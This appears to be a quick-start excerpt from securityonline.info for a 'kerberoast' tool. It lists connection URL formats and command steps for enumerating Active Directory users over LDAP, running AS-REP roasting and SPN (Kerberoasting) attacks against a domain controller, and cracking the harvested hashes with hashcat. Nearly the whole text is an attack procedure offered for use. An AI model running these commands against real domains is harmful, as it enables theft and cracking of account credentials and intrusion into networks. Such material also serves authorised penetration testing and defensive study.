From securityonline.info
For the impatient
IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following<ldap_connection_url>
: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>
: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
Steps -with SSPI-: kerberoast auto <DC_ip>
Steps -SSPI not used-:
- Look for vulnerable users via LDAP
kerberoast ldap all <ldap_connection_url> -o ldapenum
- Use ASREP roast against users in the
ldapenum_asrep_users.txt
filekerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
- Use SPN roast against users in the
ldapenum_spn_users.txt
filekerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
- Crack SPN roast and ASPREP roast output with hashcat